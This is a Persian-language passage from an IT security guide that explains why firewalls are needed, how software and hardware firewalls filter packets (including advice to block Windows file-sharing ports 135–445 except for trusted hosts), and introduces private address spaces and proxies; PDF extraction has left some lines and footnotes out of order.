ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ
ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺼﻮﺭﺕ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ
ﺩﺭ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻧﺼﺐ ﻧﻤﻮﺩ ﻳـﺎ ﺑـﺼﻮﺭﺕ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ
ﺁﺗﺶ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻗـﺮﺍﺭ
ﺩﺍﺩ.
ﺑﺎ ﺩﺭﻙ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫـﺪ
ﻭ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻗﻮﺍﻧﻴﻨﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ ﺗﻨﻈـﻴﻢ ﻧﻤـﻮﺩ ﺑﺎﻳـﺪ
ﻣﻔﻬﻮﻡ ﭘﺮﻭﺗﻜـﻞ - TCP/IPﻣﺠﻤﻮﻋـﻪ ﻗـﻮﺍﻧﻴﻨﻲ ﻛـﻪ ﺗﻤـﺎﻣﻲ
۱۰۷ﻣﻨﻈﻮﺭ ﺍﻃﻼﻋﺎﺕ ﺗﺒﺎﺩﻝ ﺷﺪﻩ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﺳﺖ
108 Router
ﺗﻠﻔﻦ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ -ﺗﻨﻬﺎ ﻳﻚ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻋﻤـﻮﻣﻲ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ ،ﺍﻣﺎ ﻫﺮ ﺍﺗﺎﻕ ﺷﻤﺎﺭﺓ ﺩﺍﺧﻠﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ(.
•
ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﻳـﺎ ﺍﺯ ﺁﻥ ﻓﺮﺳـﺘﺎﺩﻩ ﻣـﻲﺷـﻮﻧﺪ،
ﺑﺴﺘﻪ ١١٠ﻧﺎﻡ ﺩﺍﺭﻧﺪ.
•
ﺍﺯ ﻛﻠﻤﺎﺕ TCPﻭ UDPﺩﺭ ﺑﺤﺚ ﺯﻳـﺮ ﭼـﺸﻢ ﭘﻮﺷـﻲ
ﻛﻨﻴﺪ ﻭ ﭼﻨﺪﺍﻥ ﻧﮕﺮﺍﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺟﺰﺋﻴﺎﺕ ﻧﺒﺎﺷﻴﺪ.
ﭼﺮﺍ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﻴﺎﺯ ﺩﺍﺭﻳﻢ؟
ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻴﺴﺖ ﻧﻴﺎﺯﻱ
ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺪﺍﺭﻳﺪ .ﻫﻤﻴﻨﻜﻪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ ﺷـﻮﻳﺪ ﺍﻳـﻦ
ﺍﺣﺘﻤــﺎﻝ ﭘﺪﻳــﺪ ﻣــﻲﺁﻳــﺪ ﻛــﻪ ﻣﻬــﺎﺟﻤﻴﻦ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺭﺍ ﻣــﻮﺭﺩ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ:
•
ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ،ﺍﺷﺘﺮﺍﻙ ﭼﺎﭘﮕﺮ ﻳـﺎ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ
ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ،ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ
ﻣﺸﺨﺼﻲ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ )ﺩﺭ ﺍﺻﻄﻼﺡ ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ ﻛﻪ
ﺭﺍﻳﺎﻧــﻪ ﺁﻥ ﭘــﻮﺭﺕ ﺭﺍ "ﻣــﻲﺷــﻨﻮﺩ"( .ﺍﮔﺮﭼــﻪ ﺑــﺎ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮﻱ ﺑـﻪﺍﺷـﺘﺮﺍﻙ
109 Port Number
110 Packet
٩٥
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺑﮕﺬﺍﺭﻳﺪ ،ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕـﺮﻱ ﺩﺭ ﻫـﺮ ﻧﻘﻄـﺔ
ﺩﻧﻴﺎ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﺪ.
•
ﺣﺘﻲ ﺍﮔﺮ ﻧﺘﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﻴﭻ ﭘﻮﺭﺗﻲ ﻣﻨﺘﻈـﺮ ﭘﻴـﺎﻡ ﺑﻤﺎﻧﻴـﺪ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻤﭽﻨﺎﻥ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﭘﻴﺎﻣﻬـﺎﻱ ﺯﻳـﺎﺩﻱ
ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮﭼﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺁﻧﻬـﺎ
ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ ﺍﻣﺎ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﺒﻜﻪﺍﻱ
ﺷﻤﺎ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ
ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﻫﻴــﺪ )ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ ﻓﻘــﻂ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ
ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ(.
•
ﺍﮔﺮ ﻋﻠﻴﺮﻏﻢ ﺗﻼﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ،ﺗﻮﺳﻂ ﻭﻳﺮﻭﺱ ،ﻛـﺮﻡ ﻳـﺎ
ﺗﺮﺍﻭﺍ ﺁﻟﻮﺩﻩ ﺷﺪﻳﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ
ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺍﺭﺳﺎﻝ ﺷـﻮﺩ .ﺍﻳـﻦ
ﻣﻮﺭﺩ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﻗﺮﺑـﺎﻧﻲ
ﺛﺒﺖ ﺷﺪﻩ )ﺍﺯ ﺟﻤﻠﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﻣﻲﺷﻮﺩ.
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؟
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ
ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺁﻳﺎ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ
ﻣﻐﺎﻳﺮﺕ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ .ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﻮﺩ ﺭﺍﻩ ﻋﺒﻮﺭ ﺑـﺴﺘﻪﻫـﺎ ﻣـﺴﺪﻭﺩ
ﻣﻲﺷﻮﺩ .ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺳﺨﺖﺍﻓـﺰﺍﺭﻱ ﺑﻬﺘـﺮ
ﺍﺳﺖ ﻗﻮﺍﻧﻴﻦ ﺯﻳﺮ ﭘﻴﺎﺩﻩ ﺷﻮﻧﺪ:
•
ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ،137 ،135
،139ﻭ TCP/UDP 445ﻋﺒــﻮﺭ ﻛﻨــﺪ .ﺍﻳــﻦ ﭘﻮﺭﺗﻬــﺎ
ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺧﺪﻣﺎﺕ
Windowsﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ .ﺑـﺎ ﻣﺘﻮﻗـﻒ
ﺳــﺎﺧﺘﻦ ﺍﻳــﻦ ﺑــﺴﺘﻪﻫــﺎ ﺍﻃﻤﻴﻨــﺎﻥ ﺧﻮﺍﻫﻴــﺪ ﻳﺎﻓــﺖ ﻛــﻪ
ﻫﻴﭽﻜﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ.
•
ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ،137 ،135
،139ﻭ TCP/UDP 445ﻋﺒــﻮﺭ ﻛﻨــﺪ ،ﻣﮕــﺮ ﺁﻧﻜــﻪ
•
ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻧﻲ ﻛـﻪ ﺑـﻪ
ﺷﺒﻜﻪ ﺁﺳﻴﺐ ﻧﻤﻲﺭﺳﺎﻧﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺗﻌﺮﻳـﻒ
ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻄﻤﺌﻦ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺎ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ
ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ .ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺳـﺎﻳﺮ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺎﻧﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﻴـﺰ
ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻴﺪ ،ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺁﻏﺎﺯ ﻛﻨﻨﺪﺓ
ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﻴﺪ.
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻣﻨـﺎﺑﻊ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ
ﻣﻲﮔﻴﺮﻧﺪ ،ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻣﺰﻳﺖ ﻛﻪ ﺗﻨﻬﺎ ﻣﺤﺘﻮﺍﻱ ﺍﻃﻼﻋﺎﺕ )ﻫﻤﺮﺍﻩ ﺑﺎ
ﺁﺩﺭﺳﻬﺎ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻓﺮﺳﺘﻨﺪﻩ ﻳﺎ ﮔﻴﺮﻧﺪﺓ ﺁﻥ( ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﻲﻛﻨﻨﺪ؛ ﺑﻠﻜـﻪ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳـﺎﻝ ﻧﻤـﻮﺩﻩ
ﺍﺳﺖ .ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ
ﻛﺮﺩﻩ ﺑﺎﺷﺪ ،ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻗﺒﻞ ﺍﺯ ﻋﺒﻮﺭ ﺩﺍﺩﻥ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺷﻤﺎ
ﻛﺴﺐ ﺍﺟـﺎﺯﻩ ﻛﻨـﺪ .ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖ ﺍﻓـﺰﺍﺭﻱ ﻧﻤـﻲ ﺗﻮﺍﻧـﺪ
ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﺑﺮﻧﺎﻣﻪ ﺑـﺮﺍﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ
ﺷﺪﻩ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻗﺴﻤﺖ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ
ﺍﺳﺖ ،ﺳﺮﻋﺖ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﭘﺎﻳﻴﻦ ﻧﻤﻲﺁﻭﺭﺩ.
ﺍﮔﺮ ﺩﺍﺭﺍﻱ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﻫﺴﺘﻴﺪ
ﻣــﺸﺎﺑﻪ ﺗﻤــﺎﻣﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﻳﮕــﺮ ﺑﺎﻳــﺪ ﻫﻤﻴــﺸﻪ ﺁﻧــﺮﺍ
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ .ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺑﺴﻴﺎﺭ ﺧﻼﻕ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺑـﻪ ﺭﻭﺯ
ﺑﻮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ
ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ.
ﻓﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ
١١١
ﻃﺮﺍﺣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﺍﺑﺘﺪﺍ ﺑﺪﻳﻨﺼﻮﺭﺕ ﺑﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺩﺳﺘﮕﺎﻩ
ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ ﺁﺩﺭﺱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧـﻮﺩ ﺭﺍ ﺩﺍﺷـﺖ ﻭ ﻟـﺬﺍ ﻫـﺮ
ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ .ﺍﻣـﺮﻭﺯﻩ ﺑـﻪ
ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺳـﻄﺢ ﭼﻨـﺪﺍﻥ
ﻣﻄﻠﻮﺏ ﻧﻴﺴﺖ .ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
•
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺭﺍ
ﺑﺼﻮﺭﺕ ﻣﺠﺰﺍ ﺍﺯ ﺑﻘﻴﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺗـﺎ ﻧﺘﻮﺍﻧﻨـﺪ ﺑﻄـﻮﺭ
ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺳـﺎﻳﺮ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺭﺗﺒـﺎﻁ ﺩﺍﺷـﺘﻪ
111 Private Address Spaces
ﺑﺨﺶ ﺩﻭﻡ
•
ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴـﺪ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺑـﻪ ﺍﻧﺘﻈـﺎﺭ
ﺑﺎﻳﺴﺘﻴﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﺷﻜﺎﻻﺕ ،ﺷﺨﺼﻲ
ﺑﺘﻮﺍﻧﺪ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺎﻡ ﻣﺎﻫﺮﺍﻧـﻪﺍﻱ ﺑﻔﺮﺳـﺘﺪ ﻭ ﺍﺯ ﺁﻥ ﻃﺮﻳـﻖ
ﺍﻋﻤﺎﻝ ﻣﺨﺮﺑﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ ﺍﺳﺖ.
ﺁﺩﺭﺱ IPﻣﺒﺪﺃ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎﺷـﺪ
ﻛﻪ ﺷﻤﺎ ﻣﺎﻳﻠﻴﺪ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
٩٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﺮﺧﻲ
ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
•
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﻫﺎﻱ proxyﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ
ﺁﺩﺭﺳﻬﺎﻱ IPﻋﺎﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺁﻧﻬﺎ ﺑﺮﺍﻱ
ﻛﻨﺘﺮﻝ ﻧﻮﻉ ﺗﺮﺍﻓﻴﻚ ﻋﺒﻮﺭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻳﺎ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ
ﻛﺎﺭﺑﺮ ﻭ ﺷـﺒﻜﻪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﻧـﺪ .ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
proxyﻭﺏ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳـﺖﺷـﺪﻩ ﺭﺍ
ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛـﺎﺭﺑﺮ ﺩﻳﮕـﺮﻱ ﻫﻤـﺎﻥ
ﺻﻔﺤﻪ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻧﺴﺨﻪﻫﺎﻱ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﺪﻩ ﺭﺍ
ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻣـﻮﺭﺩ
ﻧﻴﺎﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺎﻫﺶ ﻣﻲ ﻳﺎﺑﺪ .ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ caching
ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ IPﺩﺭ ﻣﺤﻴﻂ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺧﺘـﺼﺎﺹ
ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺑﻪ ﺗﻌﺪﺍﺩ ﻛـﺎﻓﻲ
ﺁﺩﺭﺱ IPﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑـﻪ ﻫﻤـﺔ ﻣﺎﺷـﻴﻨﻬﺎ
ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻏﻠﺐ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ
ﺗﻮﺳﻌﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻠـﻲ ﭼﻨـﺪ ﺳـﺎﻝ
ﺑﻌﺪ ﺍﺯ ﺍﻳﺠﺎﺩ ﺷﺒﻜﻪ ﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ
ﺑﻮﺟﻮﺩ ﺁﻣﺪ.
ﺁﺩﺭﺳﻬﺎﻱ IPﻣﺸﺨـﺼﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻮﺭﺩ
ﺍﺳــﺘﻔﺎﺩﻩ ﻗــﺮﺍﺭ ﻧﻤــﻲﮔﻴﺮﻧــﺪ .ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎ "ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ
ﺧﺼﻮﺻﻲ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺩﻭ ﻣﻮﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ
ﺑﻜﺎﺭ ﺭﻭﻧـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻓـﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ
